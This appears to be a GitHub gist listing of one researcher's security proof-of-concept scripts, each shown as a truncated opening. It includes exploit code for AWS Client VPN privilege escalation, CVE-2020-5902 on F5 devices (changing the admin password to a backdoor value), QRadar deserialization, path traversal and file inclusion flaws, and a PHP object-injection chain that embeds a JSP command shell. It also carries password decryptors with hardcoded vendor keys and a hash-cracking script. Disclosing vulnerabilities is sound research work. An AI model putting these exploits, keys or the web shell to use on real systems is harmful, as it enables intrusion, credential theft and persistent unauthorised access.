@ykoster
ykoster / OutCrack.sh
Last active October 25, 2022 12:39
Quick 'n Dirty PoC for cracking OutSystems hashes with hashcat
#!/bin/bash
# Crack hashes generated by OutSystems (PoC)
# batman
hash='$1$ms7rBI3MKLalgjmCFwavo5ROC/Cw5C6QXUxwgbUrAHw=131FFFE778BF3BD89911BBA49184A14DAA625B2FA2FA8D2C086BF35FF62539B046768E1885F43A7120199867B7AFAED9A53FD1A7C165CC12C8AE24370A792754'
#hash='2A37D95E1EF22207DC6B09B55899B461'
# hunter2
#hash='$1$BYi7cMS7AXlNwKz/ozjUu9lhO83DjhNEDz5qPom78lU=2D2DC5245359DCC7F87E1D39E707E7AA1A4476D2346D5441104F29E412BADC64FAF2C6B182AD09B00AB26D5DC794456F7D75288F41E73AB440B2D8A52E3012CA'
#hash='A8629A13DC6381CC9F2166C3A36232E3'
@ykoster
ykoster / Invoke-ExploitAWSVPNLPE.psd1
Last active June 15, 2022 12:14
AWS Client VPN < 3.1.0 OpenVPN config validation flaw can be used to escalate privileges (proof of concept)
<#
Usage:
Import-Module .\Invoke-ExploitAWSVPNLPE.psd1
Invoke-ExploitAWSVPNLPE
#>
@{
RootModule = 'Invoke-ExploitAWSVPNLPE.psm1'
ModuleVersion = '1.0'
GUID = '656e7aa1-797d-42c9-ac70-4d50378f5457'
Author = 'Yorick Koster'
@ykoster
ykoster / cicdecrypt.py
Created December 24, 2020 04:44
IBM Installation Manager imcl / imutilsc encryptString command decrypt script
#!/usr/bin/env python3
import re
import sys
import base64
from Crypto.Cipher import AES
val = '^(?:[A-Z0-9+/]{4})*(?:[A-Z0-9+/]{2}==|[A-Z0-9+/]{3}=)?$'
key = base64.b64decode(b'BTQOll+YFPIcsB+vMfXNTg==')
def decrypt(e):
@ykoster
ykoster / ghcdecrypt.py
Created December 23, 2020 10:33
IBM Green Hat / Rational Integration Tester password decryptor
#!/usr/bin/env python3
import re
import sys
import array
val = '^#com.ghc.1![0-9A-F]+$'
key = array.array('H', [0x12FD, 0x4AAD, 0x4405, 0xE327, 0xA28A, 0x7211, 0x1111, 0x5543, 0x0CDD, 0x6A31, 0x4080, 0x217E, 0x7E73])
def decrypt(e):
p = re.compile(val, re.IGNORECASE)
@ykoster
ykoster / cve-2020-5902-tmsh.py
Created July 5, 2020 13:25
Proof of concept for CVE-2020-5902 - WARNING this PoC changes the password and shell of the admin user
#!/usr/bin/env python3
import os
import requests
import urllib.parse
target='<ip of target>'
base_url=f'https://{target}/'
password='B@ckd00r!'
def check(base_url):
@ykoster
ykoster / cve-2020-5902-check.sh
Last active July 8, 2020 10:02
Bash one-liner to check if a device is vulnerable to CVE-2020-5902
curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | \
grep -q Vulnerable && \
printf '\033[0;31mVulnerable\n' || \
printf '\033[0;32mNot Vulnerable\n'
@ykoster
ykoster / qradar_deserialize.py
Created April 16, 2020 08:12
Proof of concept for Java deserialization vulnerability in QRadar RemoteJavaScript Servlet
#!/usr/bin/env python3
import json
import random
import urllib3
import requests
import urllib.parse
base_url='https://127.0.0.1/'
username='admin'
password='initial'
@ykoster
ykoster / qradar_session_deserialize.py
Created April 16, 2020 08:11
Proof of concept for QRadar session manager path traversal vulnerability
#!/usr/bin/env python3
import json
import base64
import random
import urllib3
import requests
import urllib.parse
base_url=f'https://127.0.0.1/'
username='admin'
@ykoster
ykoster / qradar_php_lfi.py
Created April 16, 2020 07:55
Arbitrary class instantiation & local file inclusion vulnerability in QRadar Forensics web application (CVE-2020-4272) proof of concept
#!/usr/bin/env python3
import json
import urllib3
import requests
import urllib.parse
from requests.cookies import cookiejar_from_dict
base_url=f'https://127.0.0.1/'
username='admin'
password='initial'
@ykoster
ykoster / pop_chain.php
Created April 16, 2020 07:51
PHP object injection vulnerability in QRadar Forensics web application (CVE-2020-4271) proof of concept
<?php
include("/opt/ibm/forensics/html/includes/license.inc.php");
include("/opt/ibm/forensics/html/includes/simple_html_dom.php");
$jsp = <<<__EOF
<!DOCTYPE html>
<html>
<pre>
<%@page import="java.util.*,java.io.*"%>
<% if (request.getParameter("c") != null) {